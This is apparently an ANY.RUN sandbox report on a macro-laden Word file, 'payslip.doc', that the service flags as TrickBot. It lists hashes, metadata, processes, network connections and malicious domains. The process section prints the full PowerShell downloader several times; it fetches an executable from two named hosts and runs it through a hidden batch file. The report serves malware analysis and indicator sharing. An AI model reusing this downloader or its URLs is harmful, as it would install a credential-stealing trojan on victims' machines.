analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

payslip.doc

Full analysis: https://app.any.run/tasks/5ed3511f-da7d-44e8-b29b-29c5c0a1c98e
Verdict: Malicious activity
Threats:

TrickBot is an advanced banking trojan that attackers can use to steal payment credentials from the victims. It can redirect the victim to a fake banking cabinet and retrieve credentials typed in on the webpage.

Analysis date: November 15, 2018, 14:34:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trickbot
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Nov 15 13:11:00 2018, Last Saved Time/Date: Thu Nov 15 13:12:00 2018, Number of Pages: 1, Number of Words: 18, Number of Characters: 108, Security: 0
MD5:

6715F77143D45CD1286D1B7A0AD9BEF7

SHA1:

183AA33BE25EA44B4E29757A45846EFA64A6CD91

SHA256:

2CBB0ED6FF901B6B54B497AC6540ABBC32E9365D59EC95FD37B700BC8FD28946

SSDEEP:

384:sEt1XesnEGlGeB50+0ky0NGoGFRP9K/rVXDcxcQ1yGcS2rdy5ujtMImCeX0jOR4Q:s1sCCr2yrTqISdDANspkKrag2VpE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3900)
      • cmd.exe (PID: 3440)
      • cmd.exe (PID: 128)
      • cmd.exe (PID: 2100)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3708)
      • WINWORD.EXE (PID: 3496)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3708)
      • WINWORD.EXE (PID: 3496)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 1496)
      • powershell.exe (PID: 1228)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3300)
      • powershell.exe (PID: 1228)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3708)
      • WINWORD.EXE (PID: 3496)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3708)
      • WINWORD.EXE (PID: 3496)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 125
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 108
Words: 18
Pages: 1
ModifyDate: 2018:11:15 13:12:00
CreateDate: 2018:11:15 13:11:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Enpor Support
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\payslip.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3900cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3300powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3440cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3496"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\payslip.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
128cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1228powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2100cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1496powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 688
Read events
2 668
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
11
Text files
8
Unknown types
6

Dropped files

PID
Process
Filename
Type
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A28.tmp.cvr
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF4E48D7948B5304AE.TMP
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF3AEB2DFD2FDD14CE.TMP
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF840D67F5B78CCF62.TMP
MD5:
SHA256:
3300powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1UZINHR4NM46VQPY9Y9W.temp
MD5:
SHA256:
2904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKBEWTPCFK7NWUHGFD78.temp
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF597BA71FFBB31908.TMP
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6AB743EE-532C-4517-8A71-7029BE4923F5}.tmp
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF9120C68A21EDE4C7.TMP
MD5:
SHA256:
3708WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{17461A6C-4218-479D-87E8-3CAAF8DC7A8E}.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1496
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
2904
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
2904
powershell.exe
GET
403
67.225.140.210:80
http://bomanforklift.com/huer.buer
US
html
337 b
malicious
1496
powershell.exe
GET
403
67.225.140.210:80
http://bomanforklift.com/huer.buer
US
html
337 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1496
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
2904
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
2904
powershell.exe
67.225.140.210:80
bomanforklift.com
Liquid Web, L.L.C
US
malicious
2904
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
1496
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
1496
powershell.exe
67.225.140.210:80
bomanforklift.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
movingmountainsfoods.com
  • 213.129.84.120
malicious
bomanforklift.com
  • 67.225.140.210
malicious

Threats

No threats detected
No debug info